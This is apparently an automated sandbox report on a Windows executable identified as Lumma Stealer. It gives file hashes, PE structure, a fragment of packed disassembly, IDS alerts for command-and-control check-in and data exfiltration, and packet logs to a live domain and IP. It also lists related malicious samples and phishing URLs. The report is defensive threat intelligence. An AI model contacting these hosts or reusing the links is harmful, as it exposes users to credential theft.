              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 91%
              • Number of executed functions: 42
              • Number of non-executed functions: 68
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryDirectoryFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: LisectAVT_2403002A_236.exe
              Time | Type | Description
              16:14:45 | API Interceptor | 7x Sleep call for process: LisectAVT_2403002A_236.exe modified
              Context: related samples seen with the same indicator (Associated Sample Name / URL | Detection | Threat Name | Context IP; the SHA 256 and Browse columns were links in the original and carry no text)
              IP 104.21.48.252:
                file.exe | malicious | LummaC
                file.exe | malicious | LummaC
              Domain unhappytidydryypwto.shop:
                file.exe | malicious | LummaC | 104.21.48.252
                file.exe | malicious | LummaC | 172.67.157.26
                file.exe | malicious | LummaC | 104.21.48.252
                zmal2LjhJa.exe | malicious | LummaC | 172.67.157.26
                htzTCFcIaP.exe | malicious | LummaC | 172.67.157.26
              ASN CLOUDFLARENETUS:
                LisectAVT_2403002A_312.exe | malicious | HTMLPhisher | 104.21.11.245
                https://forms.office.com/r/qq9c20HBqa | malicious | Tycoon2FA | 104.17.25.14
                LisectAVT_2403002A_312.exe | malicious | HTMLPhisher | 104.21.11.245
                New order.exe | malicious | Snake Keylogger | 188.114.96.3
                LisectAVT_2403002A_328.exe | malicious | Petite Virus | 172.65.251.78
                LisectAVT_2403002A_328.exe | malicious | Petite Virus | 172.65.251.78
                http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VZa9fE9tHBc9fWZLirgY7_MATRo7_qx7xDq5ZlnkMcO1QobynJ6PiItP4Wtcapt8tiaBcTbWM1w1MHuIiN_t_ffA_hJhmN8MgAW_Y4IPUoI18R3nDq7jKhCU2UyzKyGI-fgPaHIzb3B6lUScBqw8xPWbXjB75jecemYLrKDX4KUr-zoRsTXM9LiZoNgvebiUwr439T1w9eWAafMqLUrMmXf67xVVD06E3Mfgln_ZkjRbhq6eRPto7d31e2ehnl7ulSLrJ4gjMw3GY4GdHZvuq26IrF7i22I755PxTKhdknNtngs2viqOUFQQVIP0HbwfHtnQ1psNsvMNcdTn_ikKemXjj5BG-TL68QdV2eLeME8V/48b/lZFswvdpTSWokKOzLlv9VQ/h6/h001.Y7M0U38MQ2nd1AVwnxBJwxsMy_vK5DUT5ew04LeckYc#KENT.GREEN@GELITA.COM | malicious | Unknown | 172.67.196.116
                LisectAVT_2403002A_337.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.206.236
                LisectAVT_2403002A_340.exe | malicious | Cryptbot | 104.21.76.57
                EXTERNAL 9 Held.msg | malicious | Unknown | 1.1.1.1
              JA3 fingerprint a0e9f5d64349fb13191bc781f81f42e1:
                LisectAVT_2403002A_282.exe | malicious | XRed | 104.21.48.252
                LisectAVT_2403002A_250.exe | malicious | XRed | 104.21.48.252
                LisectAVT_2403002A_282.exe | malicious | XRed | 104.21.48.252
                LisectAVT_2403002A_328.exe | malicious | Petite Virus | 104.21.48.252
                LisectAVT_2403002A_328.exe | malicious | Petite Virus | 104.21.48.252
                LisectAVT_2403002A_420.exe | malicious | Remcos, DBatLoader | 104.21.48.252
                LisectAVT_2403002A_425.dll | malicious | Unknown | 104.21.48.252
                LisectAVT_2403002A_428.exe | malicious | BlackMoon | 104.21.48.252
                LisectAVT_2403002A_425.dll | malicious | Unknown | 104.21.48.252
                LisectAVT_2403002A_428.exe | malicious | BlackMoon | 104.21.48.252
                  No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.957806131252642
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:LisectAVT_2403002A_236.exe
                  File size:5'735'941 bytes
                  MD5:8ecbc517b61cdb069495b3f3e3887a0f
                  SHA1:4b9170f6fe8e1b77fa1462efd4299930479f98cd
                  SHA256:4c98f158e7654d83e23027e9c94b5a6d27837c3e0302e0619b7540fe1387645e
                  SHA512:c0274591a8e799726bd1e80a3effbcc82ee9a776cca4e089801e14ddb921952cb2eab624e7c8cb5eaf55e74b14985503b3748b6b67d614b72758ad1703acb73a
                  SSDEEP:98304:+AMEgqpDZeqlCyxg5IrjgHRbPuZHqG6WAqAr7TF7IG0P9LYhHXihUK4TDqOf1pvz:+N1qRjlTxg56kHBPWAqAr7JGFLY4aKey
                  TLSH:5546233356271298D1E6C935CD37BDD071F707AA9B80E8B8A5E7B9C626329E0A313543
                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....8.e.................\............9...........@.......................................@...................................A....
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x79f308
                  Entrypoint Section:.vmp1
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x65FB38B6 [Wed Mar 20 19:27:50 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:89c8abd38fd3ffc06ee06d01f9b3cbbf
                  Instruction
                  push 6A79FA46h
                  call 00007FC6591FEBDEh
                  ror eax, 1
                  clc
                  not eax
                  ror eax, 1
                  test sp, ax
                  test esp, 61F228B7h
                  not eax
                  xor ebx, eax
                  jmp 00007FC6591673F6h
                  jmp 00007FC6590FAC7Fh
                  mov dx, word ptr [edi]
                  rcr eax, cl
                  mov cl, byte ptr [edi+02h]
                  sub edi, 00000002h
                  not ah
                  shl dx, cl
                  movsx eax, ax
                  setb ah
                  mov word ptr [edi+04h], dx
                  cwde
                  movsx ax, cl
                  lahf
                  pushfd
                  shl ax, FFE2h
                  bswap eax
                  inc ax
                  pop dword ptr [edi]
                  xor ax, 00005BB0h
                  sar al, cl
                  or ax, sp
                  mov eax, dword ptr [ebp+00h]
                  cmp bp, si
                  test bx, 6FAFh
                  add ebp, 00000004h
                  clc
                  xor eax, ebx
                  not eax
                  test di, bp
                  clc
                  xor eax, 366F2619h
                  inc eax
                  jmp 00007FC65917EDDFh
                  lea esi, dword ptr [esi+00000004h]
                  xor ecx, ebx
                  clc
                  xor ecx, 1ED827EFh
                  rol ecx, 03h
                  xor ecx, 58B57741h
                  dec ecx
                  cmc
                  stc
                  rol ecx, 1
                  jmp 00007FC6595A7496h
                  test bp, bx
                  stc
                  and esi, 000000FFh
                  mov esi, dword ptr [0087C624h+esi*4]
                  cmp bx, dx
                  test bh, FFFFFF96h
                  shr eax, 08h
                  clc
                  stc
                  xor eax, esi
                  jmp 00007FC65908DFD7h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4119cc | 0xdc | .vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8ec000 | 0x59c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x88d000 | 0x80 | .vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x35af2 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x37000 | 0x296b | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0xa254 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp0 | 0x45000 | 0x32e4b5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp1 | 0x374000 | 0x577a40 | 0x577c00 | c93a0990598b704e596652d41a628154 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x8ec000 | 0x59c | 0x600 | a74a6e53709b351af4f1fd4f43819b3a | False | 0.5078125 | data | 4.132619879851682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | ExitProcess
ole32.dll | CoCreateInstance
OLEAUT32.dll | SysAllocString
USER32.dll | CloseClipboard
GDI32.dll | BitBlt
WTSAPI32.dll | WTSSendMessageW
KERNEL32.dll | VirtualQuery
USER32.dll | GetProcessWindowStation
KERNEL32.dll | LocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
USER32.dll | GetProcessWindowStation, GetUserObjectInformationW
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T22:14:44.163830+0200 | UDP | 2051469 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (unhappytidydryypwto .shop) | 54364 | 53 | 192.168.2.9 | 1.1.1.1
2024-07-25T22:14:45.734706+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 49706 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:15:01.133815+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49713 | 40.127.169.103 | 192.168.2.9
2024-07-25T22:14:48.209574+0200 | TCP | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 49708 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:44.698527+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49706 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:55.547747+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49712 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:46.553302+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49707 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:50.869302+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49710 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:53.722138+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49711 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:47.703503+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49708 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:48.905289+0200 | TCP | 2051476 | ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI) | 49709 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:47.027495+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 49707 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:49.759772+0200 | TCP | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 49709 | 443 | 192.168.2.9 | 104.21.48.252
2024-07-25T22:14:55.552815+0200 | TCP | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 22:14:44.218904972 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:44.218944073 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:44.219022989 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:44.228465080 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:44.228486061 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:44.698277950 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:44.698527098 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:44.702908993 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:44.702928066 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:44.703309059 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:44.748670101 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.066272974 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.066468000 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.066488028 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:45.734740019 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:45.734833956 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:45.735290051 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.736958981 CEST | 49706 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.736990929 CEST | 443 | 49706 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:45.745625973 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.745673895 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:45.745744944 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.746778011 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:45.746788979 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:46.553220987 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:46.553302050 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:46.554600000 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:46.554608107 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:46.555087090 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:46.556417942 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:46.556440115 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:46.556500912 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027504921 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027551889 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027581930 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027611017 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027621984 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.027643919 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027653933 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.027673960 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027703047 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027709961 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.027715921 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.027774096 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.028331995 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.028383970 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.028424025 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.028433084 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.029194117 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.029238939 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.029247046 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.032521963 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.032602072 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.032604933 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.032664061 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.032813072 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.032830000 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.032840967 CEST | 49707 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.032845974 CEST | 443 | 49707 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.203974962 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.204011917 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.204083920 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.204428911 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.204442024 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.703392982 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.703502893 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.704824924 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.704835892 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.705116987 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:47.706448078 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.706592083 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:47.706624031 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.209574938 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.209676027 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.209748983 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.209811926 CEST | 49708 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.209834099 CEST | 443 | 49708 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.382350922 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.382412910 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.382477045 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.382816076 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.382829905 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.905209064 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.905288935 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.910664082 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.910686970 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.911042929 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.912255049 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.912404060 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.912434101 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:48.912480116 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:48.912493944 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:49.759783983 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:49.759872913 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:49.759962082 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:49.760101080 CEST | 49709 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:49.760121107 CEST | 443 | 49709 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:49.979443073 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:49.979489088 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:49.979556084 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:49.979994059 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:49.980010986 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:50.869209051 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:50.869302034 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:50.870553970 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:50.870563984 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:50.870795965 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:50.871887922 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:50.872010946 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:50.872033119 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:50.872104883 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:50.872112989 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:51.506937981 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:51.507039070 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:51.507102013 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:51.507281065 CEST | 49710 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:51.507307053 CEST | 443 | 49710 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:52.872520924 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:52.872564077 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:52.873255968 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:52.873255968 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:52.873300076 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:53.722001076 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:53.722137928 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:53.723784924 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:53.723793030 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:53.724037886 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:53.725655079 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:53.725655079 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:53.725692034 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:54.124293089 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:54.124382973 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:54.124511957 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:54.125004053 CEST | 49711 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:54.125021935 CEST | 443 | 49711 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.037812948 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.037868977 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.038079977 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.038305044 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.038321972 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.547630072 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.547746897 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.549112082 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.549120903 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.549438000 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.550777912 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.552035093 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.552088022 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.552191019 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.552221060 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.552453995 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.552514076 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.552809000 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
